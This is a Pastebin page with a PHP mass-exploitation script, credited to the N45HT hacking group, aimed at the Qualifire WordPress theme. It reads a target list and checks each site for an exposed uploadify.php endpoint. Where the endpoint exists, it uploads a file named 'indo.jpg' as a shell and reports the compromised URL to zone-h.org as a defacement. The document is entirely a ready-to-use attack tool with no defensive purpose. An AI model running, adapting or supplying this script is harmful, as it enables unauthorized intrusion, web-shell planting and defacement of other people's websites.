SHARE
TWEET

Mass WordPress Qualifire + Zone-H

choirurrizal Mar 27th, 2018 502 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. # ShinChan - N45HT - N45HT.WEB.ID
  4. fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  5. # shinchan0x1945@gmail.com
  6.  
  7. # your list.txt must a single directory with this exploiter #
  8.  
  9.  
  10. ##########################################################
  11. # Terimakasih kepada semua teman teman yang membantu membuat Exploiter ini
  12. # Exploiter ini mungkin tidak 100% work, soalnya bot njay
  13.  
  14. # Special thanks : PETR03X - Comod0x - Grav3 - FRU_403
  15.                    SCYTHE404_LOL - All Members N45HT
  16. ##########################################################
  17.  
  18. # note : jangan hapus copyright, hargai pembuat
  19.  
  20.  
  21.  
  22. # coded by ShinChan - N45HT | 04/03/2018
  23. */
  24. echo "
  25. ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  26. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  27. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  28. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  29.      WordPress Qualifire + Zone-H - coded by ShinChan
  30.  
  31. Thanks to :  PETR03X - Mr.x0x - SCYTHE404_LOL - ./Mr.Blank007
  32.                       All Members N45HT
  33.  
  34.  
  35. ";
  36. echo "Input your target list: ";
  37. $list = trim(fgets(STDIN));
  38.  
  39. $list = "qualifire.txt";
  40. $shell = "indo.jpg";
  41. $nickzoneh = "N45HT";
  42. $exploit = "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php";
  43. $path = "/";
  44.  
  45. $open = fopen("$list","r");
  46. $size = filesize("$list");
  47. $read = fread($open,$size);
  48. $lists = explode("\r\n",$read);
  49.  
  50. echo "\n";
  51.  
  52. foreach($lists as $target){
  53.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  54.         $targets = "http://$target";
  55.     }else{
  56.         $targets = $target;
  57.     }
  58.    
  59.     echo "Target => $targets\n";
  60.     echo "  [*] Checking Path : ";
  61.  
  62.     $cd = curl_init("$targets$exploit");
  63.     curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
  64.     curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
  65.     curl_exec($cd);
  66.     $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
  67.     curl_close($cd);
  68.    
  69.     if($httpcode == 200){
  70.         echo "200 OK\n";
  71.         echo "  [*] Uploading shell : ";
  72.         $ch = curl_init();
  73.         curl_setopt($ch, CURLOPT_URL, "$targets$exploit");
  74.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  75.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  76.         curl_setopt($ch, CURLOPT_POST, 1);
  77.         curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata"=>"@$shell"));
  78.         $post = curl_exec($ch);
  79.        
  80.         $cek = curl_init();
  81.         curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
  82.         curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
  83.         curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
  84.         $ceek = curl_exec($cek);
  85.         $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
  86.        
  87.         if($post == 1 or $ceeks == 200){
  88.         //if(preg_match("/hacked/",$ceek)){
  89.             echo "OK $targets$path$shell\n";
  90.             echo "  [*] Zone-H : ";
  91.             $zh = curl_init("http://zone-h.org/notify/single");
  92.             curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
  93.             curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
  94.             curl_setopt($zh, CURLOPT_POST, 1);
  95.             curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
  96.  
  97.             $postzh = curl_exec($zh);
  98.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
  99.                 echo "OK\n\n";
  100.             }else{
  101.                 echo "NO\n\n";
  102.             }
  103.         }else{
  104.             echo "Failed\n\n";
  105.         }
  106.     }else{
  107.         echo "Not Vulnerable\n\n";
  108.     }
  109.  
  110.     }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top